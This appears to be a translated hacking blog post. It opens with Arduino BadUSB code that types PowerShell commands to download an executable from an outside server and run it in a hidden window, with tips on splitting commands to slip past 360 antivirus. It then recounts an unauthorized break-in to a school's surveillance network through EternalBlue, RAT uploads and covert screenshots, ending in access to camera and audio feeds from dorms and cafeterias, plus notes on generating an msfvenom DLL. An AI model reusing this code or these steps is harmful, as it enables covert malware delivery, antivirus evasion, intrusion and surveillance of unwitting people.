  delay(500);
  Keyboard.press(KEY_LEFT_GUI);       // Win+R opens the Run dialog
  delay(500);
  Keyboard.press('r');
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(200);
  // Start PowerShell with a 1x1 window so it is barely visible, then spawn an interactive powershell inside it
  Keyboard.println("powershell -Command $win=$Host.UI.RawUI.WindowSize;$win.Height=1;$win.Width=1;$Host.UI.RawUI.Set_windowsize($win);powershell");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(4000);                        // PowerShell startup time; tune for the target machine
  // Download the payload in two separate lines: doing it in one -Command was blocked by 360
  Keyboard.println("$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(500);
  Keyboard.println("$P.dOWNLOADfILE('http://jsjxy.aust.edu.cn:8090/789.exe','d:\\789.exe')");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
  delay(1000);                        // download time; tune for the target's connection
  // Run the payload with a hidden window, then exit both PowerShell instances
  Keyboard.println("powershell -command start-process d:\\789.exe -WindowStyle Hidden;exit;exit");
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
}

void loop() {
  // nothing to do; everything happens once in setup()
}

The code is adapted from a master's code.

If the payload is downloaded directly with -Command here, 360 blocks it; splitting it into separate steps bypasses that.

Also,

powershell -Command $win=$Host.UI.RawUI.WindowSize;$win.Height=1;$win.Width=1;$Host.UI.RawUI.Set_windowsize($win);powershell

This first shrinks the PowerShell window to something tiny. We could also start powershell and then type the contents after -Command, but lingering too long on screen is too scary. After the -Command finishes, powershell exits, so just run powershell again inside it ; )

Then the AV-evading meterpreter from the master on GitHub.

Finally,

powershell -command start-process d:\\789.exe -WindowStyle Hidden;exit;exit

runs the payload hidden and closes the PowerShell window.

Compile it and put it on a server.

https://github.com/codeliker/mymig_meterpreter

Adjust the delays to the target machine's specs and that's it.
Bought an OTG adapter, wholesale from Alibaba, works fine.

Finally made a crude USB-stick shell for it.
And successfully got a shell.

A messy time taking over the whole school's surveillance system

One day a guy in the group posted an IP, saying it was the back end of the school's surveillance system. I went and looked: it was some 宇视科技 (Uniview) visual alarm management platform. Searching turned up no public vulnerabilities, and weak passwords didn't get me in either, so I scanned the whole subnet with my batch EternalBlue scanning tool. There were two embedded Windows hosts and three 64-bit Windows 7 Ultimate boxes. The embedded ones couldn't be taken; two of the three Win7 boxes fell. On the first Win7 box I found the privileges were very low and I couldn't do anything: getsystem didn't work, run getgui -e didn't work, I tried all sorts of privesc scripts and tools for opening 3389, none worked, there was no write permission on the C: drive, and UAC would trigger. I rummaged through folders hoping to find a config file for the surveillance client with a stored password, but found nothing. Then I wanted to kill the browser process and sniff the traffic, but had no permission to capture. Frustrated, I switched to D: and uploaded RATs, tried several, none connected back, which made me furious. I uploaded TeamViewer too, then took screenshots in meterpreter with screenshot -v true, but the full-screen surveillance page covered everything. I saw the mouse moving, didn't dare kill the browser process, couldn't see the TeamViewer ID and password, infuriating. So I just took screenshots for fun (you could actually modify the webcam_stream code to watch the screen in real time, it's just laggy at high resolution). Looking closely, in the top right corner in tiny letters: "Welcome, ********". Thrilled, I typed ******** as both username and password, and I was in: a weak password, it was only a matter of knowing a username. And then, you know the rest.

Cafeterias, dorms, teaching buildings, lab buildings, outdoors... and two-way audio too...

Tool used: eternalblue_doublepulsar

eternalbluepiliang in there is adapted from someone else's single-IP check script; how to use eternalblue.py and doublepulsar.py is obvious at a glance, written for convenience.

Generate a DLL with msfvenom, put it in the directory and name it eternal11.dll.